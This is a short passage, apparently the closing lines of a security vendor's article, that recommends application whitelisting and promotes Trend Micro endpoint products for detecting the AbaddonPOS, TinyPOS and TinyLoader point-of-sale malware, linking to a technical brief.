ensuring only updates associated with whitelisted applications can be installed. Endpoint solutions such as Trend Micro™ Security, Trend Micro™ Smart Protection Suites, and Trend Micro Worry-Free™ Business Security can protect users systems from AbaddonPOS, TinyPOS, and TinyLoader backdoor by detecting these malicious files. For more details on how TinyLoader serves as a software management suite for deploying and upgrading AbaddonPOS and TinyPOS, and seemingly links the two threats together, read our technical brief. Article source